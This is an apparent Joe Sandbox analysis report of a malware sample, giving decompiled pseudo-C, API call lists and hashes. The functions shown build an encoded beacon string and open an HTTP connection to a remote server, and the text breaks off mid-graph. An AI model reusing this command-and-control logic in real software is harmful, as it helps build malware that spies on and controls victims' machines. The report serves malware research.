            • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E00401459(void** __esi, PVOID* _a4) {
            				long _v8;
            				void* _v12;
            				void* _v16;
            				long _t13;
            
            				_v16 = 0;
            				asm("stosd");
            				_v8 = 0;
            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
            				if(_t13 < 0) {
            					_push(_t13);
            					return __esi[6]();
            				}
            				return 0;
            			}







            0x0040146b
            0x00401471
            0x0040147f
            0x00401486
            0x0040148b
            0x00401491
            0x00000000
            0x00401492
            0x00000000

            APIs
            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 69%
            			E02023CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
            				intOrPtr _v4;
            				intOrPtr _v8;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				void* _v48;
            				intOrPtr _v56;
            				void* __edi;
            				intOrPtr _t30;
            				void* _t31;
            				intOrPtr _t33;
            				intOrPtr _t34;
            				intOrPtr _t35;
            				intOrPtr _t36;
            				intOrPtr _t37;
            				void* _t40;
            				intOrPtr _t41;
            				int _t44;
            				intOrPtr _t45;
            				int _t48;
            				void* _t49;
            				intOrPtr _t53;
            				intOrPtr _t59;
            				intOrPtr _t63;
            				intOrPtr* _t65;
            				void* _t66;
            				intOrPtr _t71;
            				intOrPtr _t77;
            				intOrPtr _t80;
            				intOrPtr _t83;
            				int _t86;
            				intOrPtr _t88;
            				int _t91;
            				intOrPtr _t93;
            				int _t96;
            				void* _t98;
            				void* _t99;
            				void* _t103;
            				void* _t105;
            				void* _t106;
            				intOrPtr _t107;
            				long _t109;
            				intOrPtr* _t110;
            				intOrPtr* _t111;
            				long _t112;
            				int _t113;
            				void* _t114;
            				void* _t115;
            				void* _t116;
            				void* _t119;
            				void* _t120;
            				void* _t122;
            				void* _t123;
            
            				_t103 = __edx;
            				_t99 = __ecx;
            				_t120 =  &_v16;
            				_t112 = __eax;
            				_t30 =  *0x202a3e0; // 0x2ca9c20
            				_v4 = _t30;
            				_v8 = 8;
            				_t31 = RtlAllocateHeap( *0x202a2d8, 0, 0x800); // executed
            				_t98 = _t31;
            				if(_t98 != 0) {
            					if(_t112 == 0) {
            						_t112 = GetTickCount();
            					}
            					_t33 =  *0x202a018; // 0x1228dd1
            					asm("bswap eax");
            					_t34 =  *0x202a014; // 0x3a87c8cd
            					asm("bswap eax");
            					_t35 =  *0x202a010; // 0xd8d2f808
            					asm("bswap eax");
            					_t36 =  *0x202a00c; // 0x13d015ef
            					asm("bswap eax");
            					_t37 =  *0x202a348; // 0xc7d5a8
            					_t3 = _t37 + 0x202b5ac; // 0x74666f73
            					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x202a02c,  *0x202a004, _t112);
            					_t40 = E0202467F();
            					_t41 =  *0x202a348; // 0xc7d5a8
            					_t4 = _t41 + 0x202b575; // 0x74707526
            					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
            					_t122 = _t120 + 0x38;
            					_t114 = _t113 + _t44;
            					if(_a12 != 0) {
            						_t93 =  *0x202a348; // 0xc7d5a8
            						_t8 = _t93 + 0x202b508; // 0x732526
            						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
            						_t122 = _t122 + 0xc;
            						_t114 = _t114 + _t96;
            					}
            					_t45 =  *0x202a348; // 0xc7d5a8
            					_t10 = _t45 + 0x202b246; // 0x74636126
            					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
            					_t123 = _t122 + 0xc;
            					_t115 = _t114 + _t48; // executed
            					_t49 = E0202472F(_t99); // executed
            					_t105 = _t49;
            					if(_t105 != 0) {
            						_t88 =  *0x202a348; // 0xc7d5a8
            						_t12 = _t88 + 0x202b8d0; // 0x736e6426
            						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
            						_t123 = _t123 + 0xc;
            						_t115 = _t115 + _t91;
            						HeapFree( *0x202a2d8, 0, _t105);
            					}
            					_t106 = E02021340();
            					if(_t106 != 0) {
            						_t83 =  *0x202a348; // 0xc7d5a8
            						_t14 = _t83 + 0x202b8c5; // 0x6f687726
            						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
            						_t123 = _t123 + 0xc;
            						_t115 = _t115 + _t86;
            						HeapFree( *0x202a2d8, 0, _t106);
            					}
            					_t107 =  *0x202a3cc; // 0x2ca9600
            					_a20 = E02026B59( &E0202A00A, _t107 + 4);
            					_t53 =  *0x202a36c; // 0x2ca95b0
            					_t109 = 0;
            					if(_t53 != 0) {
            						_t80 =  *0x202a348; // 0xc7d5a8
            						_t17 = _t80 + 0x202b8be; // 0x3d736f26
            						wsprintfA(_t115 + _t98, _t17, _t53);
            					}
            					if(_a20 != _t109) {
            						_t116 = RtlAllocateHeap( *0x202a2d8, _t109, 0x800);
            						if(_t116 != _t109) {
            							E02022915(GetTickCount());
            							_t59 =  *0x202a3cc; // 0x2ca9600
            							__imp__(_t59 + 0x40);
            							asm("lock xadd [eax], ecx");
            							_t63 =  *0x202a3cc; // 0x2ca9600
            							__imp__(_t63 + 0x40);
            							_t65 =  *0x202a3cc; // 0x2ca9600
            							_t66 = E02026675(1, _t103, _t98,  *_t65); // executed
            							_t119 = _t66;
            							asm("lock xadd [eax], ecx");
            							if(_t119 != _t109) {
            								StrTrimA(_t119, 0x2029280);
            								_push(_t119);
            								_t71 = E02027563();
            								_v20 = _t71;
            								if(_t71 != _t109) {
            									_t110 = __imp__;
            									 *_t110(_t119, _v8);
            									 *_t110(_t116, _v8);
            									_t111 = __imp__;
            									 *_t111(_t116, _v32);
            									 *_t111(_t116, _t119);
            									_t77 = E020221A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
            									_v56 = _t77;
            									if(_t77 != 0 && _t77 != 0x10d2) {
            										E020263F6();
            									}
            									HeapFree( *0x202a2d8, 0, _v48);
            									_t109 = 0;
            								}
            								HeapFree( *0x202a2d8, _t109, _t119);
            							}
            							RtlFreeHeap( *0x202a2d8, _t109, _t116); // executed
            						}
            						HeapFree( *0x202a2d8, _t109, _a12);
            					}
            					RtlFreeHeap( *0x202a2d8, _t109, _t98); // executed
            				}
            				return _v16;
            			}


























































            0x02023ce0
            0x02023ce0
            0x02023ce0
            0x02023cf5
            0x02023cf7
            0x02023cfc
            0x02023d00
            0x02023d08
            0x02023d0e
            0x02023d12
            0x02023d1a
            0x02023d22
            0x02023d22
            0x02023d24
            0x02023d30
            0x02023d3f
            0x02023d44
            0x02023d47
            0x02023d4c
            0x02023d4f
            0x02023d54
            0x02023d57
            0x02023d63
            0x02023d70
            0x02023d72
            0x02023d78
            0x02023d7d
            0x02023d88
            0x02023d8a
            0x02023d8d
            0x02023d93
            0x02023d95
            0x02023d9e
            0x02023da9
            0x02023dab
            0x02023dae
            0x02023dae
            0x02023db0
            0x02023db5
            0x02023dc1
            0x02023dc3
            0x02023dc6
            0x02023dc8
            0x02023dcd
            0x02023dd1
            0x02023dd3
            0x02023dd8
            0x02023de4
            0x02023de6
            0x02023df2
            0x02023df4
            0x02023df4
            0x02023dff
            0x02023e03
            0x02023e05
            0x02023e0a
            0x02023e16
            0x02023e18
            0x02023e24
            0x02023e26
            0x02023e26
            0x02023e2c
            0x02023e3f
            0x02023e43
            0x02023e48
            0x02023e4c
            0x02023e4f
            0x02023e54
            0x02023e5e
            0x02023e60
            0x02023e67
            0x02023e7f
            0x02023e83
            0x02023e8f
            0x02023e94
            0x02023e9d
            0x02023eae
            0x02023eb2
            0x02023ebb
            0x02023ec1
            0x02023ec9
            0x02023ece
            0x02023edb
            0x02023ee1
            0x02023eed
            0x02023ef3
            0x02023ef4
            0x02023ef9
            0x02023eff
            0x02023f05
            0x02023f0c
            0x02023f13
            0x02023f19
            0x02023f20
            0x02023f24
            0x02023f2f
            0x02023f34
            0x02023f3a
            0x02023f43
            0x02023f43
            0x02023f54
            0x02023f5a
            0x02023f5a
            0x02023f64
            0x02023f64
            0x02023f72
            0x02023f72
            0x02023f83
            0x02023f83
            0x02023f91
            0x02023f91
            0x02023fa2

            APIs
            • RtlAllocateHeap.NTDLL ref: 02023D08
            • GetTickCount.KERNEL32 ref: 02023D1C
            • wsprintfA.USER32 ref: 02023D6B
            • wsprintfA.USER32 ref: 02023D88
            • wsprintfA.USER32 ref: 02023DA9
            • wsprintfA.USER32 ref: 02023DC1
            • wsprintfA.USER32 ref: 02023DE4
            • HeapFree.KERNEL32(00000000,00000000), ref: 02023DF4
            • wsprintfA.USER32 ref: 02023E16
            • HeapFree.KERNEL32(00000000,00000000), ref: 02023E26
            • wsprintfA.USER32 ref: 02023E5E
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02023E79
            • GetTickCount.KERNEL32 ref: 02023E89
            • RtlEnterCriticalSection.NTDLL(02CA95C0), ref: 02023E9D
            • RtlLeaveCriticalSection.NTDLL(02CA95C0), ref: 02023EBB
              • Part of subcall function 02026675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A0
              • Part of subcall function 02026675: lstrlen.KERNEL32(00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A8
              • Part of subcall function 02026675: strcpy.NTDLL ref: 020266BF
              • Part of subcall function 02026675: lstrcat.KERNEL32(00000000,00000000), ref: 020266CA
              • Part of subcall function 02026675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266E7
            • StrTrimA.SHLWAPI(00000000,02029280,00000000,02CA9600), ref: 02023EED
              • Part of subcall function 02027563: lstrlen.KERNEL32(02CA9C10,00000000,00000000,00000000,02023EF9,00000000), ref: 02027573
              • Part of subcall function 02027563: lstrlen.KERNEL32(?), ref: 0202757B
              • Part of subcall function 02027563: lstrcpy.KERNEL32(00000000,02CA9C10), ref: 0202758F
              • Part of subcall function 02027563: lstrcat.KERNEL32(00000000,?), ref: 0202759A
            • lstrcpy.KERNEL32(00000000,?), ref: 02023F0C
            • lstrcpy.KERNEL32(00000000,?), ref: 02023F13
            • lstrcat.KERNEL32(00000000,?), ref: 02023F20
            • lstrcat.KERNEL32(00000000,00000000), ref: 02023F24
              • Part of subcall function 020221A6: WaitForSingleObject.KERNEL32(00000000,746981D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02022258
            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02023F54
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02023F64
            • RtlFreeHeap.NTDLL(00000000,00000000,00000000,02CA9600), ref: 02023F72
            • HeapFree.KERNEL32(00000000,?), ref: 02023F83
            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 02023F91
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
            • String ID: Uet
            • API String ID: 186568778-2766386878
            • Opcode ID: 618a03f14c641bb7c26f116554a6a6a4abe2115fc7944d7e934ca42610257b81
            • Instruction ID: 15a0784261d7ad4947fbe79d195c7a0d40f473d6ae3ccf076381634a52337d7f
            • Opcode Fuzzy Hash: 618a03f14c641bb7c26f116554a6a6a4abe2115fc7944d7e934ca42610257b81
            • Instruction Fuzzy Hash: 0F71C531A40314AFC7319B69EC88E9777E9FB88704B260927F509D3110DB39D92CDB61
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 92%
            			E02027B83(void* __eax, void* __ecx, long __esi, char* _a4) {
            				void _v8;
            				long _v12;
            				void _v16;
            				void* _t34;
            				void* _t38;
            				void* _t40;
            				char* _t56;
            				long _t57;
            				void* _t58;
            				intOrPtr _t59;
            				long _t65;
            
            				_t65 = __esi;
            				_t58 = __ecx;
            				_v16 = 0xea60;
            				__imp__( *(__esi + 4));
            				_v12 = __eax + __eax;
            				_t56 = E020233DC(__eax + __eax + 1);
            				if(_t56 != 0) {
            					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
            						E020261DA(_t56);
            					} else {
            						E020261DA( *(__esi + 4));
            						 *(__esi + 4) = _t56;
            					}
            				}
            				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
            				 *(_t65 + 0x10) = _t34;
            				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02027B18) == 0xffffffff) {
            					L15:
            					return GetLastError();
            				} else {
            					ResetEvent( *(_t65 + 0x1c));
            					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
            					 *(_t65 + 0x14) = _t38;
            					if(_t38 != 0 || GetLastError() == 0x3e5 && E020216B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
            						_t59 =  *0x202a348; // 0xc7d5a8
            						_t15 = _t59 + 0x202b845; // 0x544547
            						_v8 = 0x84404000;
            						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
            						 *(_t65 + 0x18) = _t40;
            						if(_t40 == 0) {
            							goto L15;
            						}
            						_t57 = 4;
            						_v12 = _t57;
            						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
            							_v8 = _v8 | 0x00000100;
            							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
            						}
            						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
            							goto L15;
            						} else {
            							return 0;
            						}
            					} else {
            						goto L15;
            					}
            				}
            			}














            0x02027b83
            0x02027b83
            0x02027b8e
            0x02027b95
            0x02027b9d
            0x02027ba7
            0x02027bad
            0x02027bc0
            0x02027bd0
            0x02027bc2
            0x02027bc5
            0x02027bca
            0x02027bca
            0x02027bc0
            0x02027be0
            0x02027be6
            0x02027beb
            0x02027cd4
            0x00000000
            0x02027c06
            0x02027c09
            0x02027c1c
            0x02027c22
            0x02027c27
            0x02027c4f
            0x02027c62
            0x02027c6c
            0x02027c6f
            0x02027c75
            0x02027c7a
            0x00000000
            0x00000000
            0x02027c7e
            0x02027c8a
            0x02027c9b
            0x02027c9d
            0x02027cae
            0x02027cae
            0x02027cbe
            0x00000000
            0x02027cd0
            0x00000000
            0x02027cd0
            0x00000000
            0x00000000
            0x00000000
            0x02027c27

            APIs
            • lstrlen.KERNEL32(?,00000008,74654D40), ref: 02027B95
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02027BB8
            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02027BE0
            • InternetSetStatusCallback.WININET(00000000,02027B18), ref: 02027BF7
            • ResetEvent.KERNEL32(?), ref: 02027C09
            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 02027C1C
            • GetLastError.KERNEL32 ref: 02027C29
            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 02027C6F
            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02027C8D
            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02027CAE
            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02027CBA
            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02027CCA
            • GetLastError.KERNEL32 ref: 02027CD4
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
            • String ID: @MetNet
            • API String ID: 2290446683-2109406137
            • Opcode ID: 348af19b77194b06a5beb9efdadb4eac86956e62e3cf9d42f7d79961bd5e4ac0
            • Instruction ID: 970b87c1465faefc2f14705f4ce91d4aa115d2e77911871d203d27677ff4aa11
            • Opcode Fuzzy Hash: 348af19b77194b06a5beb9efdadb4eac86956e62e3cf9d42f7d79961bd5e4ac0
            • Instruction Fuzzy Hash: 57418071A00318BFD7329F65CD88E9BBBBDFB84714F21492AF502D10A0D735A658DB20
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 147 2026815-2026847 memset CreateWaitableTimerA 148 20269c8-20269ce 147->148 149 202684d-20268a6 _allmul SetWaitableTimer WaitForMultipleObjects 147->149 156 20269d2-20269dc 148->156 150 2026930-2026936 149->150 151 20268ac-20268af 149->151 153 2026937-202693b 150->153 154 20268b1 call 2025251 151->154 155 20268ba 151->155 157 202694b-202694f 153->157 158 202693d-202693f 153->158 161 20268b6-20268b8 154->161 160 20268c4 155->160 157->153 162 2026951-202695b CloseHandle 157->162 158->157 163 20268c8-20268cd 160->163 161->155 161->160 162->156 164 20268e0-202690d call 20235d2 163->164 165 20268cf-20268d6 163->165 169 202690f-202691a 164->169 170 202695d-2026962 164->170 165->164 166 20268d8 165->166 166->164 169->163 171 202691c-202692c call 20269e6 169->171 172 2026981-2026989 170->172 173 2026964-202696a 170->173 171->150 176 202698f-20269bd _allmul SetWaitableTimer WaitForMultipleObjects 172->176 173->150 175 202696c-202697f call 20263f6 173->175 175->176 176->163 177 20269c3 176->177 177->150
            C-Code - Quality: 83%
            			E02026815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
            				void _v48;
            				long _v52;
            				struct %anon52 _v60;
            				char _v72;
            				long _v76;
            				void* _v80;
            				union _LARGE_INTEGER _v84;
            				struct %anon52 _v92;
            				void* _v96;
            				void* _v100;
            				union _LARGE_INTEGER _v104;
            				long _v108;
            				struct %anon52 _v124;
            				long _v128;
            				struct %anon52 _t46;
            				void* _t51;
            				long _t53;
            				void* _t54;
            				struct %anon52 _t61;
            				long _t65;
            				struct %anon52 _t66;
            				void* _t69;
            				void* _t73;
            				signed int _t74;
            				void* _t76;
            				void* _t78;
            				void** _t82;
            				signed int _t86;
            				void* _t89;
            
            				_t76 = __edx;
            				_v52 = 0;
            				memset( &_v48, 0, 0x2c);
            				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
            				_t46 = CreateWaitableTimerA(0, 1, 0);
            				_v60 = _t46;
            				if(_t46 == 0) {
            					_v92.HighPart = GetLastError();
            				} else {
            					_push(0xffffffff);
            					_push(0xff676980);
            					_push(0);
            					_push( *0x202a2e0);
            					_v76 = 0;
            					_v80 = 0;
            					L020282DA();
            					_v84.LowPart = _t46;
            					_v80 = _t76;
            					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
            					_t51 =  *0x202a30c; // 0x1b4
            					_v76 = _t51;
            					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
            					_v108 = _t53;
            					if(_t53 == 0) {
            						if(_a8 != 0) {
            							L4:
            							 *0x202a2ec = 5;
            						} else {
            							_t69 = E02025251(_t76); // executed
            							if(_t69 != 0) {
            								goto L4;
            							}
            						}
            						_v104.LowPart = 0;
            						L6:
            						L6:
            						if(_v104.LowPart == 1 && ( *0x202a300 & 0x00000001) == 0) {
            							_v104.LowPart = 2;
            						}
            						_t74 = _v104.LowPart;
            						_t58 = _t74 << 4;
            						_t78 = _t89 + (_t74 << 4) + 0x38;
            						_t75 = _t74 + 1;
            						_v92.LowPart = _t74 + 1;
            						_t61 = E020235D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
            						_v124 = _t61;
            						if(_t61 != 0) {
            							goto L17;
            						}
            						_t66 = _v92;
            						_v104.LowPart = _t66;
            						if(_t66 != 3) {
            							goto L6;
            						} else {
            							_v124.HighPart = E020269E6(_t75,  &_v72, _a4, _a8);
            						}
            						goto L12;
            						L17:
            						__eflags = _t61 - 0x10d2;
            						if(_t61 != 0x10d2) {
            							_push(0xffffffff);
            							_push(0xff676980);
            							_push(0);
            							_push( *0x202a2e4);
            							goto L21;
            						} else {
            							__eflags =  *0x202a2e8; // 0x0
            							if(__eflags == 0) {
            								goto L12;
            							} else {
            								_t61 = E020263F6();
            								_push(0xffffffff);
            								_push(0xdc3cba00);
            								_push(0);
            								_push( *0x202a2e8);
            								L21:
            								L020282DA();
            								_v104.LowPart = _t61;
            								_v100 = _t78;
            								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
            								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
            								_v128 = _t65;
            								__eflags = _t65;
            								if(_t65 == 0) {
            									goto L6;
            								} else {
            									goto L12;
            								}
            							}
            						}
            						L25:
            					}
            					L12:
            					_t82 =  &_v72;
            					_t73 = 3;
            					do {
            						_t54 =  *_t82;
            						if(_t54 != 0) {
            							HeapFree( *0x202a2d8, 0, _t54);
            						}
            						_t82 =  &(_t82[4]);
            						_t73 = _t73 - 1;
            					} while (_t73 != 0);
            					CloseHandle(_v80);
            				}
            				return _v92.HighPart;
            				goto L25;
            			}
































            0x02026815
            0x0202682b
            0x0202682f
            0x02026834
            0x0202683b
            0x02026841
            0x02026847
            0x020269ce
            0x0202684d
            0x0202684d
            0x0202684f
            0x02026854
            0x02026855
            0x0202685b
            0x0202685f
            0x02026863
            0x02026871
            0x0202687f
            0x02026883
            0x02026885
            0x02026892
            0x0202689e
            0x020268a0
            0x020268a6
            0x020268af
            0x020268ba
            0x020268ba
            0x020268b1
            0x020268b1
            0x020268b8
            0x00000000
            0x00000000
            0x020268b8
            0x020268c4
            0x00000000
            0x020268c8
            0x020268cd
            0x020268d8
            0x020268d8
            0x020268e0
            0x020268e6
            0x020268ee
            0x020268f7
            0x020268fe
            0x02026902
            0x02026907
            0x0202690d
            0x00000000
            0x00000000
            0x0202690f
            0x02026913
            0x0202691a
            0x00000000
            0x0202691c
            0x0202692c
            0x0202692c
            0x00000000
            0x0202695d
            0x0202695d
            0x02026962
            0x02026981
            0x02026983
            0x02026988
            0x02026989
            0x00000000
            0x02026964
            0x02026964
            0x0202696a
            0x00000000
            0x0202696c
            0x0202696c
            0x02026971
            0x02026973
            0x02026978
            0x02026979
            0x0202698f
            0x0202698f
            0x02026997
            0x020269a5
            0x020269a9
            0x020269b5
            0x020269b7
            0x020269bb
            0x020269bd
            0x00000000
            0x020269c3
            0x00000000
            0x020269c3
            0x020269bd
            0x0202696a
            0x00000000
            0x02026962
            0x02026930
            0x02026932
            0x02026936
            0x02026937
            0x02026937
            0x0202693b
            0x02026945
            0x02026945
            0x0202694b
            0x0202694e
            0x0202694e
            0x02026955
            0x02026955
            0x020269dc
            0x00000000

            APIs
            • memset.NTDLL ref: 0202682F
            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0202683B
            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02026863
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02026883
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,020226E9,?), ref: 0202689E
            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,020226E9,?,00000000), ref: 02026945
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,020226E9,?,00000000,?,?), ref: 02026955
            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0202698F
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 020269A9
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 020269B5
              • Part of subcall function 02025251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02CA9218,00000000,?,746AF710,00000000,746AF730), ref: 020252A0
              • Part of subcall function 02025251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02CA9160,?,00000000,30314549,00000014,004F0053,02CA9270), ref: 0202533D
              • Part of subcall function 02025251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,020268B6), ref: 0202534F
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,020226E9,?,00000000,?,?), ref: 020269C8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
            • String ID: Uet$@MetNet
            • API String ID: 3521023985-1616585941
            • Opcode ID: bfa46d15f11166f0e289d17108e24a14b03314b264154570fbac098fa89b2d6f
            • Instruction ID: a855e523cbc60c2e50a82043e026a642d29a63f82493c9708c7d000f6335a9cc
            • Opcode Fuzzy Hash: bfa46d15f11166f0e289d17108e24a14b03314b264154570fbac098fa89b2d6f
            • Instruction Fuzzy Hash: 9A518071408324AFC7219F158C44D9BBBECFB85324F604A1BF89592190DB35D55CDF92
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 181 2027fc5-202802a 182 202804b-2028075 181->182 183 202802c-2028046 RaiseException 181->183 185 2028077 182->185 186 202807a-2028086 182->186 184 20281fb-20281ff 183->184 185->186 187 2028088-2028093 186->187 188 2028099-202809b 186->188 187->188 200 20281de-20281e5 187->200 189 2028143-202814d 188->189 190 20280a1-20280a8 188->190 194 2028159-202815b 189->194 195 202814f-2028157 189->195 192 20280aa-20280b6 190->192 193 20280b8-20280c5 LoadLibraryA 190->193 192->193 197 2028108-2028114 InterlockedExchange 192->197 196 20280c7-20280d7 193->196 193->197 198 20281d9-20281dc 194->198 199 202815d-2028160 194->199 195->194 213 20280e7-2028103 RaiseException 196->213 214 20280d9-20280e5 196->214 207 2028116-202811a 197->207 208 202813c-202813d FreeLibrary 197->208 198->200 203 2028162-2028165 199->203 204 202818e-202819c GetProcAddress 199->204 205 20281e7-20281f4 200->205 206 20281f9 200->206 203->204 210 2028167-2028172 203->210 204->198 211 202819e-20281ae 204->211 205->206 206->184 207->189 212 202811c-2028128 LocalAlloc 207->212 208->189 210->204 215 2028174-202817a 210->215 221 20281b0-20281b8 211->221 222 